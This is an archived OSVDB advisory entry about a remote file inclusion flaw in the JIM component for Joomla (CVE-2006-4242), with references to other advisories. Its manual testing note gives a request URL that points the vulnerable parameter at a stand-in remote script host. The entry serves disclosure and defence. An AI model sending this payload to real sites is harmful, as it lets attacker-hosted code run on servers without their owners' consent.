JIM for Joomla install.jim.php mosConfig_absolute_path Variable Remote File Inclusion

2006-08-17T06:34:17
ID OSVDB:27990
Type osvdb
Reporter OSVDB
Modified 2006-08-17T06:34:17

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?

References:

Vendor URL: http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,884/Itemid,35/ Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Secunia Advisory ID:21545 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0365.html Generic Exploit URL: http://milw0rm.com/exploits/2203 FrSIRT Advisory: ADV-2006-3313 CVE-2006-4242 Bugtraq ID: 19575